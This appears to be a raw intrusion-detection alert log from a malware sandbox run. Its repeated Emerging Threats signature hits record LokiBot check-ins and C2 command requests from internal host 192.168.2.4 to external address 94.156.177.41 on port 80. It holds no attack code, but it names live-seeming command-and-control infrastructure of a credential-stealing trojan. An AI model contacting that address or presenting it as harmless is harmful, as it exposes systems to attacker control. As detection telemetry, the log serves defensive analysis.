                                                                                  2024-12-04T06:52:55.009703+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977694.156.177.4180TCP
                                                                                  2024-12-04T06:52:56.524407+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977694.156.177.4180TCP
                                                                                  2024-12-04T06:52:56.524407+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977694.156.177.4180TCP
                                                                                  2024-12-04T06:52:56.644483+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449776TCP
                                                                                  2024-12-04T06:52:56.900865+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977894.156.177.4180TCP
                                                                                  2024-12-04T06:52:56.900865+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977894.156.177.4180TCP
                                                                                  2024-12-04T06:52:56.900865+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977894.156.177.4180TCP
                                                                                  2024-12-04T06:52:58.372095+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977894.156.177.4180TCP
                                                                                  2024-12-04T06:52:58.372095+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977894.156.177.4180TCP
                                                                                  2024-12-04T06:52:58.498303+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449778TCP
                                                                                  2024-12-04T06:52:58.761872+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978094.156.177.4180TCP
                                                                                  2024-12-04T06:52:58.761872+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978094.156.177.4180TCP
                                                                                  2024-12-04T06:52:58.761872+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978094.156.177.4180TCP
                                                                                  2024-12-04T06:53:00.231152+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978094.156.177.4180TCP
                                                                                  2024-12-04T06:53:00.231152+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978094.156.177.4180TCP
                                                                                  2024-12-04T06:53:00.351213+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449780TCP
                                                                                  2024-12-04T06:53:00.620039+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978694.156.177.4180TCP
                                                                                  2024-12-04T06:53:00.620039+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978694.156.177.4180TCP
                                                                                  2024-12-04T06:53:00.620039+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978694.156.177.4180TCP
                                                                                  2024-12-04T06:53:02.093707+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978694.156.177.4180TCP
                                                                                  2024-12-04T06:53:02.093707+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978694.156.177.4180TCP
                                                                                  2024-12-04T06:53:02.213689+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449786TCP
                                                                                  2024-12-04T06:53:02.477302+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979294.156.177.4180TCP
                                                                                  2024-12-04T06:53:02.477302+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979294.156.177.4180TCP
                                                                                  2024-12-04T06:53:02.477302+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979294.156.177.4180TCP
                                                                                  2024-12-04T06:53:04.009007+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979294.156.177.4180TCP
                                                                                  2024-12-04T06:53:04.009007+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979294.156.177.4180TCP
                                                                                  2024-12-04T06:53:04.129571+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449792TCP
                                                                                  2024-12-04T06:53:04.401220+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979394.156.177.4180TCP
                                                                                  2024-12-04T06:53:04.401220+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979394.156.177.4180TCP
                                                                                  2024-12-04T06:53:04.401220+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979394.156.177.4180TCP
                                                                                  2024-12-04T06:53:05.702695+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979394.156.177.4180TCP
                                                                                  2024-12-04T06:53:05.702695+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979394.156.177.4180TCP
                                                                                  2024-12-04T06:53:05.822697+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449793TCP
                                                                                  2024-12-04T06:53:06.095984+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979994.156.177.4180TCP
                                                                                  2024-12-04T06:53:06.095984+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979994.156.177.4180TCP
                                                                                  2024-12-04T06:53:06.095984+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979994.156.177.4180TCP
                                                                                  2024-12-04T06:53:07.476673+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979994.156.177.4180TCP
                                                                                  2024-12-04T06:53:07.476673+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979994.156.177.4180TCP
                                                                                  2024-12-04T06:53:07.596717+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449799TCP
                                                                                  2024-12-04T06:53:07.851506+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980594.156.177.4180TCP
                                                                                  2024-12-04T06:53:07.851506+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980594.156.177.4180TCP
                                                                                  2024-12-04T06:53:07.851506+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980594.156.177.4180TCP
                                                                                  2024-12-04T06:53:09.330217+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980594.156.177.4180TCP
                                                                                  2024-12-04T06:53:09.330217+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980594.156.177.4180TCP
                                                                                  2024-12-04T06:53:09.450203+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449805TCP
                                                                                  2024-12-04T06:53:09.713035+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981194.156.177.4180TCP
                                                                                  2024-12-04T06:53:09.713035+01002025381ET MALWARE LokiBot Checkin1192.168.2.44981194.156.177.4180TCP
                                                                                  2024-12-04T06:53:09.713035+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981194.156.177.4180TCP
                                                                                  2024-12-04T06:53:11.164303+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981194.156.177.4180TCP
                                                                                  2024-12-04T06:53:11.164303+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981194.156.177.4180TCP
                                                                                  2024-12-04T06:53:11.284231+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449811TCP
                                                                                  2024-12-04T06:53:11.637327+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981694.156.177.4180TCP
                                                                                  2024-12-04T06:53:11.637327+01002025381ET MALWARE LokiBot Checkin1192.168.2.44981694.156.177.4180TCP
                                                                                  2024-12-04T06:53:11.637327+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981694.156.177.4180TCP
                                                                                  2024-12-04T06:53:12.980893+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981694.156.177.4180TCP
                                                                                  2024-12-04T06:53:12.980893+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981694.156.177.4180TCP
                                                                                  2024-12-04T06:53:13.101166+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449816TCP
                                                                                  2024-12-04T06:53:13.370849+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981894.156.177.4180TCP
                                                                                  2024-12-04T06:53:13.370849+01002025381ET MALWARE LokiBot Checkin1192.168.2.44981894.156.177.4180TCP
                                                                                  2024-12-04T06:53:13.370849+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981894.156.177.4180TCP
                                                                                  2024-12-04T06:53:14.868129+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981894.156.177.4180TCP
                                                                                  2024-12-04T06:53:14.868129+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981894.156.177.4180TCP
                                                                                  2024-12-04T06:53:14.988014+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449818TCP
                                                                                  2024-12-04T06:53:15.244855+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982494.156.177.4180TCP
                                                                                  2024-12-04T06:53:15.244855+01002025381ET MALWARE LokiBot Checkin1192.168.2.44982494.156.177.4180TCP
                                                                                  2024-12-04T06:53:15.244855+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982494.156.177.4180TCP
                                                                                  2024-12-04T06:53:16.678278+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982494.156.177.4180TCP
                                                                                  2024-12-04T06:53:16.678278+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982494.156.177.4180TCP
                                                                                  2024-12-04T06:53:16.798129+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449824TCP
                                                                                  2024-12-04T06:53:17.057306+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982994.156.177.4180TCP
                                                                                  2024-12-04T06:53:17.057306+01002025381ET MALWARE LokiBot Checkin1192.168.2.44982994.156.177.4180TCP
                                                                                  2024-12-04T06:53:17.057306+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982994.156.177.4180TCP
                                                                                  2024-12-04T06:53:18.586498+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982994.156.177.4180TCP
                                                                                  2024-12-04T06:53:18.586498+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982994.156.177.4180TCP
                                                                                  2024-12-04T06:53:18.706548+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449829TCP
                                                                                  2024-12-04T06:53:18.965518+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983494.156.177.4180TCP
                                                                                  2024-12-04T06:53:18.965518+01002025381ET MALWARE LokiBot Checkin1192.168.2.44983494.156.177.4180TCP
                                                                                  2024-12-04T06:53:18.965518+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983494.156.177.4180TCP
                                                                                  2024-12-04T06:53:20.454492+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983494.156.177.4180TCP
                                                                                  2024-12-04T06:53:20.454492+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983494.156.177.4180TCP
                                                                                  2024-12-04T06:53:20.574452+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449834TCP
                                                                                  2024-12-04T06:53:20.841367+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984194.156.177.4180TCP
                                                                                  2024-12-04T06:53:20.841367+01002025381ET MALWARE LokiBot Checkin1192.168.2.44984194.156.177.4180TCP
                                                                                  2024-12-04T06:53:20.841367+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984194.156.177.4180TCP
                                                                                  2024-12-04T06:53:22.119370+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984194.156.177.4180TCP
                                                                                  2024-12-04T06:53:22.119370+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984194.156.177.4180TCP
                                                                                  2024-12-04T06:53:22.239334+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449841TCP
                                                                                  2024-12-04T06:53:22.493732+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984594.156.177.4180TCP
                                                                                  2024-12-04T06:53:22.493732+01002025381ET MALWARE LokiBot Checkin1192.168.2.44984594.156.177.4180TCP
                                                                                  2024-12-04T06:53:22.493732+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984594.156.177.4180TCP
                                                                                  2024-12-04T06:53:23.990954+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984594.156.177.4180TCP
                                                                                  2024-12-04T06:53:23.990954+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984594.156.177.4180TCP
                                                                                  2024-12-04T06:53:24.111122+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449845TCP
                                                                                  2024-12-04T06:53:24.369185+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44985094.156.177.4180TCP
                                                                                  2024-12-04T06:53:24.369185+01002025381ET MALWARE LokiBot Checkin1192.168.2.44985094.156.177.4180TCP
                                                                                  2024-12-04T06:53:24.369185+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44985094.156.177.4180TCP
                                                                                  2024-12-04T06:53:25.847762+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44985094.156.177.4180TCP
                                                                                  2024-12-04T06:53:25.847762+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44985094.156.177.4180TCP
                                                                                  2024-12-04T06:53:25.967804+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449850TCP
                                                                                  2024-12-04T06:53:26.229898+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44985594.156.177.4180TCP
                                                                                  2024-12-04T06:53:26.229898+01002025381ET MALWARE LokiBot Checkin1192.168.2.44985594.156.177.4180TCP
                                                                                  2024-12-04T06:53:26.229898+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44985594.156.177.4180TCP
                                                                                  2024-12-04T06:53:27.716217+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44985594.156.177.4180TCP
                                                                                  2024-12-04T06:53:27.716217+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44985594.156.177.4180TCP
                                                                                  2024-12-04T06:53:27.836168+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449855TCP
                                                                                  2024-12-04T06:53:28.109936+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986194.156.177.4180TCP
                                                                                  2024-12-04T06:53:28.109936+01002025381ET MALWARE LokiBot Checkin1192.168.2.44986194.156.177.4180TCP
                                                                                  2024-12-04T06:53:28.109936+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986194.156.177.4180TCP
                                                                                  2024-12-04T06:53:29.409695+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986194.156.177.4180TCP
                                                                                  2024-12-04T06:53:29.409695+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986194.156.177.4180TCP
                                                                                  2024-12-04T06:53:29.529651+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449861TCP
                                                                                  2024-12-04T06:53:29.804559+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986694.156.177.4180TCP
                                                                                  2024-12-04T06:53:29.804559+01002025381ET MALWARE LokiBot Checkin1192.168.2.44986694.156.177.4180TCP
                                                                                  2024-12-04T06:53:29.804559+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986694.156.177.4180TCP
                                                                                  2024-12-04T06:53:31.273515+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986694.156.177.4180TCP
                                                                                  2024-12-04T06:53:31.273515+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986694.156.177.4180TCP
                                                                                  2024-12-04T06:53:31.393432+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449866TCP
                                                                                  2024-12-04T06:53:31.659622+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44987194.156.177.4180TCP
                                                                                  2024-12-04T06:53:31.659622+01002025381ET MALWARE LokiBot Checkin1192.168.2.44987194.156.177.4180TCP
                                                                                  2024-12-04T06:53:31.659622+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44987194.156.177.4180TCP
                                                                                  2024-12-04T06:53:33.162635+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44987194.156.177.4180TCP
                                                                                  2024-12-04T06:53:33.162635+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44987194.156.177.4180TCP
                                                                                  2024-12-04T06:53:33.282610+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449871TCP
                                                                                  2024-12-04T06:53:33.543135+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44987594.156.177.4180TCP
                                                                                  2024-12-04T06:53:33.543135+01002025381ET MALWARE LokiBot Checkin1192.168.2.44987594.156.177.4180TCP
                                                                                  2024-12-04T06:53:33.543135+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44987594.156.177.4180TCP
                                                                                  2024-12-04T06:53:35.093148+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44987594.156.177.4180TCP
                                                                                  2024-12-04T06:53:35.093148+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44987594.156.177.4180TCP
                                                                                  2024-12-04T06:53:35.213127+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449875TCP
                                                                                  2024-12-04T06:53:35.720159+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44988194.156.177.4180TCP
                                                                                  2024-12-04T06:53:35.720159+01002025381ET MALWARE LokiBot Checkin1192.168.2.44988194.156.177.4180TCP
                                                                                  2024-12-04T06:53:35.720159+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44988194.156.177.4180TCP
                                                                                  2024-12-04T06:53:37.030637+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44988194.156.177.4180TCP
                                                                                  2024-12-04T06:53:37.030637+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44988194.156.177.4180TCP
                                                                                  2024-12-04T06:53:37.150752+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449881TCP
                                                                                  2024-12-04T06:53:37.417338+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44988694.156.177.4180TCP
                                                                                  2024-12-04T06:53:37.417338+01002025381ET MALWARE LokiBot Checkin1192.168.2.44988694.156.177.4180TCP
                                                                                  2024-12-04T06:53:37.417338+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44988694.156.177.4180TCP
                                                                                  2024-12-04T06:53:38.846753+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44988694.156.177.4180TCP
                                                                                  2024-12-04T06:53:38.846753+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44988694.156.177.4180TCP
                                                                                  2024-12-04T06:53:38.966714+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449886TCP
                                                                                  2024-12-04T06:53:39.230433+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44989194.156.177.4180TCP
                                                                                  2024-12-04T06:53:39.230433+01002025381ET MALWARE LokiBot Checkin1192.168.2.44989194.156.177.4180TCP
                                                                                  2024-12-04T06:53:39.230433+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44989194.156.177.4180TCP
                                                                                  2024-12-04T06:53:40.713775+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44989194.156.177.4180TCP
                                                                                  2024-12-04T06:53:40.713775+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44989194.156.177.4180TCP
                                                                                  2024-12-04T06:53:40.833744+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449891TCP
                                                                                  2024-12-04T06:53:41.090316+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44989694.156.177.4180TCP
                                                                                  2024-12-04T06:53:41.090316+01002025381ET MALWARE LokiBot Checkin1192.168.2.44989694.156.177.4180TCP
                                                                                  2024-12-04T06:53:41.090316+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44989694.156.177.4180TCP
                                                                                  2024-12-04T06:53:42.517335+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44989694.156.177.4180TCP
                                                                                  2024-12-04T06:53:42.517335+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44989694.156.177.4180TCP
                                                                                  2024-12-04T06:53:42.637349+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449896TCP
                                                                                  2024-12-04T06:53:42.933722+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44990294.156.177.4180TCP
                                                                                  2024-12-04T06:53:42.933722+01002025381ET MALWARE LokiBot Checkin1192.168.2.44990294.156.177.4180TCP
                                                                                  2024-12-04T06:53:42.933722+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44990294.156.177.4180TCP
                                                                                  2024-12-04T06:53:44.404340+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44990294.156.177.4180TCP
                                                                                  2024-12-04T06:53:44.404340+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44990294.156.177.4180TCP
                                                                                  2024-12-04T06:53:44.524266+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449902TCP
                                                                                  2024-12-04T06:53:44.792352+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44990694.156.177.4180TCP
                                                                                  2024-12-04T06:53:44.792352+01002025381ET MALWARE LokiBot Checkin1192.168.2.44990694.156.177.4180TCP
                                                                                  2024-12-04T06:53:44.792352+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44990694.156.177.4180TCP
                                                                                  2024-12-04T06:53:46.309965+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44990694.156.177.4180TCP
                                                                                  2024-12-04T06:53:46.309965+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44990694.156.177.4180TCP
                                                                                  2024-12-04T06:53:46.431533+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449906TCP
                                                                                  2024-12-04T06:53:46.706490+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991294.156.177.4180TCP
                                                                                  2024-12-04T06:53:46.706490+01002025381ET MALWARE LokiBot Checkin1192.168.2.44991294.156.177.4180TCP
                                                                                  2024-12-04T06:53:46.706490+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991294.156.177.4180TCP
                                                                                  2024-12-04T06:53:48.190933+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991294.156.177.4180TCP
                                                                                  2024-12-04T06:53:48.190933+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991294.156.177.4180TCP
                                                                                  2024-12-04T06:53:48.311015+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449912TCP
                                                                                  2024-12-04T06:53:48.570673+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991694.156.177.4180TCP
                                                                                  2024-12-04T06:53:48.570673+01002025381ET MALWARE LokiBot Checkin1192.168.2.44991694.156.177.4180TCP
                                                                                  2024-12-04T06:53:48.570673+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991694.156.177.4180TCP
                                                                                  2024-12-04T06:53:50.049274+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991694.156.177.4180TCP
                                                                                  2024-12-04T06:53:50.049274+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991694.156.177.4180TCP
                                                                                  2024-12-04T06:53:50.169203+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449916TCP
                                                                                  2024-12-04T06:53:50.433426+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44992094.156.177.4180TCP
                                                                                  2024-12-04T06:53:50.433426+01002025381ET MALWARE LokiBot Checkin1192.168.2.44992094.156.177.4180TCP
                                                                                  2024-12-04T06:53:50.433426+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44992094.156.177.4180TCP
                                                                                  2024-12-04T06:53:51.907714+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44992094.156.177.4180TCP
                                                                                  2024-12-04T06:53:51.907714+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44992094.156.177.4180TCP
                                                                                  2024-12-04T06:53:52.029213+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449920TCP
                                                                                  2024-12-04T06:53:52.290981+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44992594.156.177.4180TCP
                                                                                  2024-12-04T06:53:52.290981+01002025381ET MALWARE LokiBot Checkin1192.168.2.44992594.156.177.4180TCP
                                                                                  2024-12-04T06:53:52.290981+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44992594.156.177.4180TCP
                                                                                  2024-12-04T06:53:53.783128+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44992594.156.177.4180TCP
                                                                                  2024-12-04T06:53:53.783128+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44992594.156.177.4180TCP
                                                                                  2024-12-04T06:53:53.903102+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449925TCP
                                                                                  2024-12-04T06:53:54.163772+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44993094.156.177.4180TCP
                                                                                  2024-12-04T06:53:54.163772+01002025381ET MALWARE LokiBot Checkin1192.168.2.44993094.156.177.4180TCP
                                                                                  2024-12-04T06:53:54.163772+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44993094.156.177.4180TCP
                                                                                  2024-12-04T06:53:55.529845+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44993094.156.177.4180TCP
                                                                                  2024-12-04T06:53:55.529845+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44993094.156.177.4180TCP
                                                                                  2024-12-04T06:53:55.649895+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449930TCP
                                                                                  2024-12-04T06:53:55.922617+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44993694.156.177.4180TCP
                                                                                  2024-12-04T06:53:55.922617+01002025381ET MALWARE LokiBot Checkin1192.168.2.44993694.156.177.4180TCP
                                                                                  2024-12-04T06:53:55.922617+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44993694.156.177.4180TCP
                                                                                  2024-12-04T06:53:57.398751+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44993694.156.177.4180TCP
                                                                                  2024-12-04T06:53:57.398751+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44993694.156.177.4180TCP
                                                                                  2024-12-04T06:53:57.518639+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449936TCP
                                                                                  2024-12-04T06:53:57.777455+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44994194.156.177.4180TCP
                                                                                  2024-12-04T06:53:57.777455+01002025381ET MALWARE LokiBot Checkin1192.168.2.44994194.156.177.4180TCP
                                                                                  2024-12-04T06:53:57.777455+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44994194.156.177.4180TCP
                                                                                  2024-12-04T06:53:59.245469+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44994194.156.177.4180TCP
                                                                                  2024-12-04T06:53:59.245469+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44994194.156.177.4180TCP
                                                                                  2024-12-04T06:53:59.365409+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449941TCP
                                                                                  2024-12-04T06:53:59.620459+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44994694.156.177.4180TCP
                                                                                  2024-12-04T06:53:59.620459+01002025381ET MALWARE LokiBot Checkin1192.168.2.44994694.156.177.4180TCP
                                                                                  2024-12-04T06:53:59.620459+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44994694.156.177.4180TCP
                                                                                  2024-12-04T06:54:01.080502+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44994694.156.177.4180TCP
                                                                                  2024-12-04T06:54:01.080502+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44994694.156.177.4180TCP
                                                                                  2024-12-04T06:54:01.200593+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449946TCP
                                                                                  2024-12-04T06:54:01.491745+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44995094.156.177.4180TCP
                                                                                  2024-12-04T06:54:01.491745+01002025381ET MALWARE LokiBot Checkin1192.168.2.44995094.156.177.4180TCP
                                                                                  2024-12-04T06:54:01.491745+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44995094.156.177.4180TCP
